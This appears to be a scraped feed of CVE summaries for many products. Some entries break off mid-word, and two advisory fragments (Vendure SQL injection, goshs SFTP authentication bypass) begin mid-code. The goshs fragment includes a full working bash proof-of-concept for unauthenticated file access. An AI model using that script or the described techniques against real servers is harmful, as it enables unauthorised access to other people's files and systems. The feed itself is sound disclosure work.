Privilege escalation in Microsoft Defender Antimalware Platform versions before 4.18.26030.3011 allows authenticated local attackers to gain elevated system privileges through insufficiently granular access controls. CVSS 7.8 (High) reflects local attack vector requiring low privileges. EPSS score of 0.04% (12th percentile) indicates low probability of widespread exploitation. Microsoft has released a patched version (4.18.26030.3011) addressing the access control deficiency.
Improper input validation in Microsoft SharePoint Server enables network-based spoofing attacks without authentication, allowing attackers to forge communications and deceive users. Affects SharePoint Enterprise Server 2016, SharePoint Server 2019, and SharePoint Server Subscription Edition. This vulnerability is confirmed actively exploited (CISA KEV) with publicly available exploit code, making it a critical operational priority despite the moderate CVSS score of 6.5.
Windows Shell protection mechanism failure (CVE-2026-32202) allows remote attackers to perform spoofing attacks over a network without authentication, requiring only user interaction. This low-severity vulnerability affects multiple Windows versions from Windows 10 1607 through Windows 11 26H1 and Windows Server 2012 through 2025. While not actively exploited in the wild, vendor patches are available across all affected versions, and the low CVSS score (4.3) reflects limited confidentiality impact and no availability impact despite the network-accessible attack vector.
OS command injection in Fortinet FortiSandbox 4.4.0-4.4.8 and FortiSandbox PaaS versions 21.3-23.4 enables remote unauthenticated attackers to execute arbitrary system commands with complete system compromise. CVSS 9.8 (network, low complexity, no privileges) but EPSS 0.29% (53rd percentile) suggests limited real-world exploitation observed despite maximum severity score. No active exploitation confirmed (not in CISA KEV). SSVC framework classifies as automatable with total technical impact but no known exploitation. Fortinet PSIRT advisory FG-IR-26-100 available but description incomplete (missing attack vector specifics).
Path traversal in Fortinet FortiSandbox 4.4.0-4.4.8 and 5.0.0-5.0.5 enables remote unauthenticated attackers to achieve full system compromise. With CVSS 9.8 (AV:N/AC:L/PR:N/UI:N), the vulnerability permits network-based exploitation without credentials or user interaction, leading to complete confidentiality, integrity, and availability impact. Despite critical severity, EPSS score of 0.06% (18th percentile) indicates low observed exploitation probability. No active exploitation confirmed (not in CISA KEV). SSVC framework marks it as automatable with total technical impact but no current exploitation. The incomplete CVE description (placeholder text for attack vector) suggests early disclosure; verify completeness with Fortinet advisory FG-IR-26-112.
{ctx.languageCode}' THEN 2 WHEN '${ctx.channel.defaultLanguageCode}' THEN 1 ELSE 0 END`, 'sort_order', ) ``` TypeORM has no opportunity to parameterize this value because it is embedded directly into the SQL string before being passed to the query builder. The `languageCode` value can originate from the HTTP query string and is set on the request context for every incoming API request. The value is cast to the `LanguageCode` TypeScript type at compile time, but no runtime validation is performed -- the raw query string value is used as-is. An unauthenticated attacker can append a crafted `languageCode` query parameter to any Shop API request to inject arbitrary SQL into the query. No user interaction is required. The vulnerable endpoint is exposed on every default Vendure installation. **Upgrade to a patched version immediately.** If you cannot upgrade right away, apply the following hotfix to `RequestContextService.getLanguageCode` to validate the `languageCode` input at the boundary. This blocks injection payloads before they can reach any query: ```ts private getLanguageCode(req: Request, channel: Channel): LanguageCode | undefined { const queryLanguageCode = req.query?.languageCode as string | undefined; const isValidFormat = queryLanguageCode && /^[a-zA-Z0-9_-]+$/.test(queryLanguageCode); return ( (isValidFormat ? (queryLanguageCode as LanguageCode) : undefined) ?? channel.defaultLanguageCode ?? this.configService.defaultLanguageCode ); } ``` This replaces the existing `getLanguageCode` method in `packages/core/src/service/helpers/request-context/request-context.service.ts`. Invalid values are silently dropped and the channel's default language is used instead. The patched versions additionally convert the vulnerable SQL interpolation to a parameterized query as defense in depth.
Infinite loop denial-of-service vulnerability in Microsoft .NET Framework (3.5 through 4.8.1), .NET 8.0, 9.0, and 10.0 allows unauthenticated remote attackers to exhaust server resources via specially crafted network requests. The vulnerability (CWE-835) stems from unreachable loop exit conditions in core .NET processing logic, enabling complete service disruption with low attack complexity. Vendor-released patches are available across all affected product lines. No public exploit identified at
Denial-of-service condition in Microsoft .NET Framework 8.0, 9.0, and 10.0 allows unauthenticated remote attackers to exhaust system resources through network-based uncontrolled resource consumption. Affects .NET 8.0 versions prior to 8.0.26, .NET 9.0 versions prior to 9.0.15, and .NET 10.0 versions prior to 10.0.6. Microsoft has released patches addressing CWE-400 resource exhaustion. No evidence of active exploitation (not listed in CISA KEV) at time of analysis, though the network-accessible, unauthenticated attack vector and low complexity (CVSS AV:N/AC:L/PR:N) present significant availability risk for internet-facing .NET applications.
Reflected cross-site scripting (XSS) in XWiki's compare view allows unauthenticated attackers to execute arbitrary JavaScript in a user's browser by injecting malicious code through unescaped URL parameters in the page revision comparison feature. When the victim is an administrator, successful exploitation compromises the confidentiality, integrity, and availability of the entire XWiki instance. Vendor-released patch is available; no public exploit code or active exploitation has been confirmed at time of analysis.
Remote code execution as root in Jellyfin media server versions prior to 10.11.7 allows authenticated users with 'Upload Subtitles' permission to execute arbitrary code through a multi-stage attack chain exploiting path traversal in subtitle uploads, arbitrary file write, and ld.so.preload manipulation. CVSS 9.9 (Critical) reflects the complete system compromise potential. EPSS data not available. Not listed in CISA KEV, indicating no confirmed active exploitation at time of analysis. Attack requires low-privilege authenticated access but can escalate to full root-level code execution.
Remote code execution as root in OpenRemote IoT platform's rules engine (versions prior to 1.20.3) allows authenticated non-superuser attackers with write:rules role to execute arbitrary Java code via unsandboxed JavaScript rulesets. The vulnerability stems from Nashorn ScriptEngine.eval() executing user-supplied JavaScript without ClassFilter restrictions, enabling Java.type() access to any JVM class including java.lang.Runtime. Attackers can compromise the entire multi-tenant platform, steal c
Remote code execution in Webkul Krayin CRM v2.2.x allows authenticated attackers with low-level privileges to upload and execute malicious PHP files through an unrestricted file upload vulnerability in the /admin/tinymce/upload endpoint. The scope change (CVSS S:C) indicates potential container escape or cross-tenant impact. Authentication requirement confirmed (CVSS PR:L). No public exploit identified at time of analysis, though technical details are available in security advisory references.
SQL injection in SAP Business Planning and Consolidation (BPC) and SAP Business Warehouse (BW) allows authenticated users to execute arbitrary SQL commands against the database. Affected versions span SAP_BW 750-758, BPC4HANA 300, and HANABPC 810/816. The scope-change vector (S:C) indicates attackers can pivot beyond the vulnerable component to compromise database resources serving multiple SAP applications. Despite critical CVSS 9.9 severity, EPSS exploitation probability remains low (0.05%, 14th percentile) with CISA SSVC indicating no current exploitation and non-automatable attack profile. SAP security note 3719353 provides remediation guidance.
Remote code execution in Adobe Connect 12.10 and earlier (including 2025.3) allows unauthenticated attackers to execute arbitrary code by exploiting unsafe deserialization. Attack requires no user interaction despite UI:R in CVSS vector, with scope change enabling container escape or privilege escalation beyond the application context. Adobe released patch APSB26-37. EPSS score of 1.50% (81st percentile) indicates moderate exploitation probability. No active exploitation confirmed (SSVC: exploitation=none), but deserialization flaws are commonly targeted once details emerge.
Unauthenticated remote code execution via JMX monitoring port affects Talend JobServer and Talend Runtime (CVSS 9.8). Attackers can exploit the exposed JMX interface without authentication to execute arbitrary code with JobServer privileges. Vendor-released patches available (Talend ESB Runtime R2024-07-RT). No confirmed active exploitation (CISA KEV status: NO), but the trivial attack complexity (AC:L) and network accessibility (AV:N) present significant risk for exposed instances. EPSS data not provided.
An issue in Hostbill v.2025-11-24 and 2025-12-01 allows a remote attacker to execute arbitrary code and escalate privileges via the CSV registration field
Remote code execution in Windows IKE Extension (Internet Key Exchange) via double free memory corruption allows unauthenticated network attackers to execute arbitrary code on Windows 10 (1607-22H2), Windows 11 (22H3-26H1), and Windows Server (2016-2025). CVSS 9.8 critical severity with network vector requiring no authentication or user interaction. Vendor patch released by Microsoft addresses CWE-415 double free weakness. EPSS score of 0.07% (21st percentile) suggests low observed exploitation probability despite critical severity rating, indicating this may be a targeted or difficult-to-exploit vulnerability in production environments. No CISA KEV listing or public POC identified at time of analysis.
Arbitrary command and code execution in PraisonAI's workflow engine (versions <4.5.139) and praisonaiagents (<1.5.140) allows remote unauthenticated attackers to execute shell commands and Python code through malicious YAML workflow files. The vulnerability stems from unsafe processing of 'run:', 'script:', and 'python:' directives in job-type workflows without validation or sandboxing. With a critical CVSS score of 9.8 and network-accessible attack vector requiring no privileges or user interac
Remote code execution in Microsoft SQL Server 2022 (GDR) allows authenticated network attackers to execute arbitrary code with high confidentiality, integrity, and availability impact via untrusted pointer dereference. The vulnerability affects SQL Server 2022 (GDR) versions below 16.0.1175.1, requires low-privilege authenticated access (PR:L), and has low attack complexity (AC:L), making it straightforward to exploit once network access is obtained. Vendor-released patch available (version 16.0.1175.1). No public exploit identified at time of analysis, though the network attack vector and low complexity suggest moderate near-term exploitation risk.
Azure Logic Apps fails to adequately protect stored credentials, enabling authenticated attackers with network access to escalate privileges and gain unauthorized access to sensitive data. With a CVSS score of 8.8 and low attack complexity (AC:L), this vulnerability poses significant risk to cloud environments where Logic Apps handle integration credentials. Microsoft has released a patch addressing the credential protection weakness. No public exploit identified at time of analysis, though the low complexity suggests straightforward exploitation once authentication is obtained.
{ logger.Fatal("When using SFTP you need to either specify an authorized keyfile using -sfk or username and password using -b") } ``` That parsing logic then splits `-b ':pass'` into an empty username and a non-empty password: ```go auth := strings.SplitN(opts.BasicAuth, ":", 2) opts.Username = auth[0] opts.Password = auth[1] ``` But the SFTP server only installs a password handler if both the username and password are non-empty: ```go if s.Username != "" && s.Password != "" { sshServer.PasswordHandler = func(ctx ssh.Context, password string) bool { return ctx.User() == s.Username && password == s.Password } } ``` With `-b ':pass'`, that condition is false, so no password authentication is enforced for SFTP sessions. Relevant source locations: - `options/options.go:264-266` - `sanity/checks.go:82-85` - `sanity/checks.go:102-109` - `sftpserver/sftpserver.go:82-85` I manually verified the issue on `v2.0.0-beta.5`. The server was started with the documented empty-user auth syntax `-b ':pass'`, but an SFTP client still downloaded a file without supplying any key or password. Manual verification commands used: `Terminal 1` ```bash cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' go build -o /tmp/goshs_beta5 ./ rm -rf /tmp/goshs_authless_root /tmp/authless_sftp.txt mkdir -p /tmp/goshs_authless_root printf 'root file\n' > /tmp/goshs_authless_root/test.txt /tmp/goshs_beta5 -p 18102 -sftp -d /tmp/goshs_authless_root --sftp-port 2223 -b ':pass' ``` `Terminal 2` ```bash printf 'get /tmp/goshs_authless_root/test.txt /tmp/authless_sftp.txt\nbye\n' | \ sftp -o PreferredAuthentications=none,password -o PubkeyAuthentication=no \ -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -P 2223 -b - foo@127.0.0.1 cat /tmp/authless_sftp.txt ``` Expected result: - the SFTP session succeeds without a key - there is no password prompt - `cat /tmp/authless_sftp.txt` prints `root file` PoC Video 1: https://github.com/user-attachments/assets/1ef1539d-bf29-419b-a26e-46aa405effb4 Single-script verification: ```bash '/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc2' ``` `gosh_poc2` script content: ```bash #!/usr/bin/env bash set -euo pipefail REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' BIN='/tmp/goshs_beta5_sftp_empty_user' ROOT='/tmp/goshs_authless_root' DOWNLOAD='/tmp/authless_sftp.txt' HTTP_PORT='18102' SFTP_PORT='2223' SERVER_PID="" cleanup() { if [[ -n "${SERVER_PID:-}" ]]; then kill "${SERVER_PID}" >/dev/null 2>&1 || true wait "${SERVER_PID}" 2>/dev/null || true fi } trap cleanup EXIT echo '[1/5] Building goshs beta.5' cd "${REPO}" go build -o "${BIN}" ./ echo '[2/5] Preparing test root' rm -rf "${ROOT}" "${DOWNLOAD}" mkdir -p "${ROOT}" printf 'root file\n' > "${ROOT}/test.txt" echo "[3/5] Starting goshs with documented empty-user auth syntax on SFTP ${SFTP_PORT}" "${BIN}" -p "${HTTP_PORT}" -sftp -d "${ROOT}" --sftp-port "${SFTP_PORT}" -b ':pass' \ >/tmp/gosh_poc2.log 2>&1 & SERVER_PID=$! for _ in $(seq 1 40); do if python3 - <<PY import socket s = socket.socket() try: s.connect(("127.0.0.1", ${SFTP_PORT})) raise SystemExit(0) except OSError: raise SystemExit(1) finally: s.close() PY then break fi sleep 0.25 done echo '[4/5] Connecting without password or key' printf "get ${ROOT}/test.txt ${DOWNLOAD}\nbye\n" | \ sftp -o PreferredAuthentications=none,password -o PubkeyAuthentication=no \ -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null -P "${SFTP_PORT}" -b - foo@127.0.0.1 echo '[5/5] Verifying unauthenticated file access' echo "Downloaded content: $(cat "${DOWNLOAD}")" if [[ "$(cat "${DOWNLOAD}")" == 'root file' ]]; then echo '[RESULT] VULNERABLE: empty-user SFTP password auth leaves the server unauthenticated' else echo '[RESULT] NOT REPRODUCED' exit 1 fi ``` PoC Video 2: https://github.com/user-attachments/assets/b8f632b7-20f4-49f1-b207-b2502af49b77 This is an authentication bypass in the SFTP service. An external attacker does not need valid credentials to access the exposed SFTP root when the operator follows the documented `-b ':pass'` syntax. That enables unauthenticated reading, uploading, renaming, and deleting of files within the configured SFTP root, depending on server mode and filesystem permissions. Suggested fixes: 1. Install the SFTP password handler whenever a password is configured, even if the username is an empty string. 2. If empty usernames are not intended for SFTP, reject `-b ':pass'` during option validation whenever `-sftp` is enabled. 3. Add an integration test that starts SFTP with `-b ':pass'` and verifies that unauthenticated sessions are rejected.
Local privilege escalation in Windows Push Notifications across Windows 10/11 and Server 2016-2025 allows low-privileged authenticated users to gain SYSTEM-level access via race condition exploitation. The vulnerability affects all currently supported Windows versions with confirmed vendor patches available. Attack complexity is low with no user interaction required, enabling straightforward exploitation once local access is obtained. The scope change (S:C) indicates the attacker can impact reso
SQL injection in Grocery Store Management System 1.0 allows unauthenticated remote attackers to execute arbitrary SQL commands through the sitem_name parameter in search_products_itname.php. The vulnerability achieves maximum CVSS 9.8 due to network accessibility without authentication, enabling complete database compromise including data exfiltration, modification, and potential system takeover. EPSS data not available; no confirmed active exploitation (CISA KEV) identified at time of analysis, though publicly available exploit code exists per researcher advisory.
Time-based blind SQL injection in manikandan580 School Management System 1.0 allows unauthenticated remote attackers to extract sensitive database contents and potentially execute arbitrary SQL commands through the fromdate POST parameter in /studentms/admin/between-date-reprtsdetails.php. The CVSS 9.8 critical score reflects network-based exploitation requiring no privileges or user interaction, with complete confidentiality, integrity, and availability impact. No public exploit identified at time of analysis, though the specific vulnerable parameter and injection type are documented in public security advisories.
A SQL injection vulnerability exists in the School Management System (version 1.0) by manikandan580. An unauthenticated or authenticated remote attacker can supply a crafted HTTP request to the affected endpoint to manipulate SQL query logic and extract sensitive database information.
A vulnerability was identified in OpenAI Codex CLI v0.23.0 and before that enables code execution through malicious MCP (Model Context Protocol) configuration files. The attack is triggered when a user runs the codex command inside a malicious or compromised repository. Codex automatically loads project-local .env and .codex/config.toml files without requiring user confirmation, allowing attackers to embed arbitrary commands that execute immediately.
An issue pertaining to CWE-843: Access of Resource Using Incompatible Type was discovered in transloadit uppy v0.25.6.
Cross-package metadata injection in NuGet Gallery backend allows authenticated attackers to achieve remote code execution and arbitrary blob storage writes through crafted .nuspec files. Attackers exploit URI fragment injection via unsanitized package identifiers to control blob paths in the storage container, enabling tampering of existing content beyond .nupkg files. CVSS 9.6 (Critical) with network attack vector, low complexity, and scope change. Vendor-released patch available in commit 0e80f87628349207cdcaf55358491f8a6f1ca276. No public exploit identified at time of analysis.
Remote code execution in Adobe Connect 12.10 and earlier allows unauthenticated network attackers to execute arbitrary code via deserialization of untrusted data. The vulnerability has changed scope (CVSS 9.3), enabling impact beyond the vulnerable component. Adobe issued patch APSB26-37. EPSS indicates 81st percentile risk with 1.44% probability, and CISA SSVC reports no active exploitation. The CVSS vector conflicts with the description: vector indicates user interaction required (UI:R) while description states 'does not require user interaction' - verify actual interaction requirements with Adobe advisory.
Memory corruption in Microsoft Office Word enables local code execution through a use-after-free flaw affecting Microsoft 365 Apps for Enterprise and Office LTSC 2021/2024 for Windows and Mac. Despite the local attack vector (AV:L), the vulnerability requires no privileges (PR:N) or user interaction (UI:N), allowing unauthorized attackers to execute arbitrary code with high impact to confidentiality, integrity, and availability (CVSS 8.4). Vendor-released patch available via Microsoft Security Response Center as of April 2026. No public exploit identified at time of analysis, though the technical simplicity (AC:L) and memory corruption primitive increase weaponization risk.
Microsoft Office Word untrusted pointer dereference (CWE-822) enables local code execution with high impact across Microsoft 365 Apps for Enterprise and Office LTSC 2021/2024 editions (Windows and macOS). The vulnerability requires local access but no privileges or user interaction (CVSS:3.1/AV:L/AC:L/PR:N/UI:N), allowing unauthenticated local attackers to achieve full system compromise. Vendor-released patch available per Microsoft Security Response Center advisory. No public exploit identified at time of analysis. SSVC assessment indicates no confirmed exploitation, non-automatable attack, but total technical impact (full control).
Use-after-free memory corruption in Microsoft Office (versions 2016 through LTSC 2024, including Microsoft 365 Apps for Enterprise) enables local code execution with no authentication or user interaction required. Attackers with local system access can execute arbitrary code with high impact to confidentiality, integrity, and availability (CVSS 8.4). No public exploit identified at time of analysis. Vendor-released patch available via Microsoft Security Response Center for all affected versions.
Arbitrary file read via ffmpeg argument injection in Jellyfin media server versions before 10.11.7 allows unauthenticated remote attackers to exfiltrate sensitive server files (including /etc/shadow) through malicious StreamOptions query parameters. The vulnerability bypasses input validation by exploiting the ParseStreamOptions method, which concatenates unsanitized lowercase query parameters directly into ffmpeg command lines, enabling drawtext filter injection to render file contents in video streams. CVSS 9.3 (Critical) with network attack vector and no authentication required. No public exploit identified at time of analysis, though the technical details in the advisory provide a clear exploitation path.
DOM-based XSS in Adobe Connect 12.10 and earlier (including 2025.3) enables malicious JavaScript execution in victim browsers when users visit attacker-crafted webpages. The changed scope in CVSS vector (S:C) indicates the vulnerability can affect resources beyond the vulnerable component's security authority, potentially allowing lateral access to other Connect features or sessions. Adobe has released a patch in APSB26-37. EPSS exploitation probability is low (0.10%, 27th percentile) with no confirmed active exploitation (not in CISA KEV), suggesting this is currently a theoretical risk rather than an imminent mass-exploitation threat.
Reflected XSS in Adobe Connect 12.10 and earlier enables attackers to execute malicious JavaScript in victim browsers through crafted URLs. The changed scope (S:C) indicates potential escape from Adobe Connect's application context to access other origins, elevating impact beyond typical reflected XSS. CVSS 9.3 reflects high confidentiality/integrity impact with scope change, though real-world exploitation requires social engineering (UI:R). EPSS score of 0.10% (27th percentile) and SSVC classification of non-automatable with no observed exploitation suggest this is lower priority than CVSS alone indicates, despite the high numerical score.
Reflected XSS in Adobe Connect versions 12.10 and earlier enables attackers to execute malicious JavaScript in victim browsers through crafted URLs. The changed scope (S:C) in the CVSS vector indicates the vulnerability can affect resources beyond the vulnerable component, elevating the severity to 9.3 despite being 'just' XSS. Requires user interaction (clicking malicious link) but no authentication. EPSS score of 0.10% (27th percentile) suggests low probability of mass exploitation. CISA SSVC framework rates this as non-automatable with total technical impact but no observed exploitation, indicating priority for patch deployment in internet-facing Adobe Connect deployments but not emergency response level.
Remote code execution in Adobe ColdFusion 2023.18, 2025.6 and earlier allows unauthenticated adjacent network attackers to execute arbitrary code via improper input validation. The vulnerability requires no user interaction and achieves scope change, enabling attackers to break out of security boundaries. CVSS 9.3 (Critical). No confirmed active exploitation or public POC identified at time of analysis, but the combination of zero authentication requirements and code execution impact makes this a high-priority patching target for ColdFusion deployments.
Sandbox escape in Terrarium enables arbitrary code execution with root privileges on the host system through JavaScript prototype chain traversal. This local attack requires no authentication or user interaction and breaks out of the sandbox entirely (scope change from container to host). CERT/CC publicly disclosed the vulnerability (VU#414811). EPSS probability is very low at 0.02% (5th percentile), and CISA SSVC indicates no active exploitation detected. Despite the critical 9.3 CVSS score, real-world risk appears limited by local attack vector and absence of widespread targeting, though the total technical impact (root-level host compromise) makes this severe for any deployment running untrusted code in Terrarium sandboxes.
Authentication bypass in OAuth2 Proxy versions before 7.15.2 allows remote unauthenticated attackers to access protected resources when deployed with nginx auth_request integration and health check features enabled. Attackers can spoof health check User-Agent headers to bypass OAuth2 authentication entirely, gaining unauthorized access to upstream applications. CVSS 9.1 (Critical) reflects network-accessible, low-complexity attack requiring no privileges or user interaction. No active exploitation confirmed (not in CISA KEV), but the trivial attack complexity and authentication bypass impact warrant immediate patching in affected deployments using nginx auth_request with --ping-user-agent or --gcp-healthchecks flags.
Unauthenticated remote session hijacking in PraisonAI's browser bridge (versions <4.5.139) and praisonaiagents (<1.5.140) allows network attackers to control browser automation sessions without authentication. The /ws WebSocket endpoint accepts connections from any client omitting the Origin header, enabling attackers to send start_session commands that hijack idle browser-extension sessions and receive all automation outputs. With CVSS 9.1 (Critical) scoring driven by network attack vector, low complexity, and no authentication requirement (AV:N/AC:L/PR:N), this represents a severe risk in any deployment where the default 0.0.0.0 binding exposes the service to untrusted networks. No public exploit identified at time of analysis, though exploitation requires only basic WebSocket client capabilities.
Unauthenticated data deletion in LearnPress WordPress LMS plugin (versions ≤4.3.2.8) allows remote attackers to delete arbitrary quiz answer options without authentication. The plugin exposes wp_rest nonces to unauthenticated visitors in public frontend HTML and uses this nonce as the sole security gate for its AJAX dispatcher, while the delete_question_answer() function lacks both capability and ownership verification. With CVSS 9.1 (Critical) scoring and network-exploitable attack vector requi
HTTP request smuggling in Eclipse Jetty's HTTP/1.1 parser lets remote unauthenticated attackers desynchronize front-end/back-end request boundaries by abusing quoted-string chunk extensions. Jetty incorrectly terminates chunk-extension parsing at a CRLF located inside an unterminated quoted-string (e.g. `1;a="`) rather than rejecting it, so attacker-controlled bytes are reinterpreted as a second, smuggled request on the same TCP connection. Publicly available exploit code exists (a working Python PoC ships in the GHSA advisory), though EPSS is very low (0.03%, 9th percentile) and the issue is not on CISA KEV.
Header injection vulnerability in Apache APISIX. The attacker can take advantage of certain configuration in forward-auth plugin to inject malicious headers. This issue affects Apache APISIX: from 2.12.0 through 3.15.0. Users are recommended to upgrade to version 3.16.0, which fixes the issue.
GitHub Actions credential leakage in PraisonAI through ArtiPACKED attack exposes GITHUB_TOKEN and ACTIONS_RUNTIME_TOKEN in workflow artifacts. Versions 4.5.139 and below persist credentials in .git/config via actions/checkout without disabling persist-credentials, allowing any user with read access to public repository artifacts to extract tokens and compromise the supply chain. CVSS 9.1 (Critical) with network-accessible, unauthenticated attack vector. EPSS data not provided; no confirmed active exploitation (KEV status not indicated), but attack technique is publicly documented by Palo Alto Unit42 and widely reported. Vendor-released patch available in version 4.5.140.
Progress OpenEdge 12.2.0-12.2.18 and 12.8.0-12.8.9 expose stored passwords and secrets to decryption through cryptographically weak OECH1 prefix encoding. Remote unauthenticated attackers can exploit this weakness to recover obfuscated credentials and sensitive data (CVSS 9.1, VC:H/VI:H). No public exploit identified at time of analysis, but the vulnerability is automatable with total technical impact per SSVC framework, making credential harvesting straightforward once encoding is accessed.
Escape sequence injection in Microsoft Power Apps versions prior to 3.26032.10.0 allows authenticated attackers with low privileges to bypass security controls and achieve remote code execution with high confidentiality, integrity, and availability impact across security boundaries. The vulnerability requires user interaction and affects Power Apps 1710 (build 9.2.23071.136 and earlier). EPSS score of 0.08% (23rd percentile) suggests low probability of mass exploitation despite critical CVSS 9.0 rating. Vendor patch available via Microsoft Security Response Center advisory.
Argument injection in upKeeper Instant Privilege Access through version 1.5.0 enables remote authenticated attackers to hijack privileged execution threads via manipulated command delimiters. The network-accessible attack vector combined with high confidentiality, integrity, and availability impacts across both vulnerable and subsequent systems creates critical risk for privilege escalation scenarios. EPSS data not available; no confirmed active exploitation (CISA KEV) or public exploit code identified at time of analysis, though vendor self-disclosure suggests potential for targeted abuse.
Soundness violation in SP1 V6 recursive proof verifier enables malicious provers to construct recursive proofs from invalid shard proofs that native verifiers would reject. The vulnerability affects SP1 zkVM versions 6.0.0 through 6.0.2 (Rust crates sp1_sdk, sp1_recursion_circuit, sp1_prover) and allows forgery of zero-knowledge proofs by exploiting missing consistency checks between commitment-side and evaluation-side trace shape witnesses in the jagged PCS verifier circuit. This permits misrepresentation of circuit structure itself, not just data, undermining the fundamental soundness guarantees of the proof system. No public exploit exists at time of analysis, though the vulnerability was identified through SP1's bug bounty program on Code4rena. CVSS 8.9 reflects high integrity impact to both vulnerable and subsequent system components.
Privilege escalation in Azure Monitor Agent versions prior to 1.41.0 exploits insecure deserialization of untrusted data, allowing authenticated local attackers with low privileges to achieve full system compromise (high confidentiality, integrity, and availability impact). CVSS 7.8 severity reflects local attack vector with low complexity and no user interaction required. No public exploit identified at time of analysis, though the vulnerability class (CWE-502) is well-understood and frequently targeted. Microsoft has released patch version 1.41.0 to address this flaw.
Deserialization of untrusted data in Microsoft HPC Pack 2019 enables authenticated local attackers to escalate privileges to SYSTEM level. Affects all versions below 6.3.8355. Vendor-released patch available via Microsoft Security Response Center. CVSS 7.8 reflects high impact (complete system compromise) with low attack complexity requiring only low-level authenticated access. No public exploit identified at time of analysis, though CWE-502 deserialization flaws are well-understood and commonly weaponized once technical details emerge.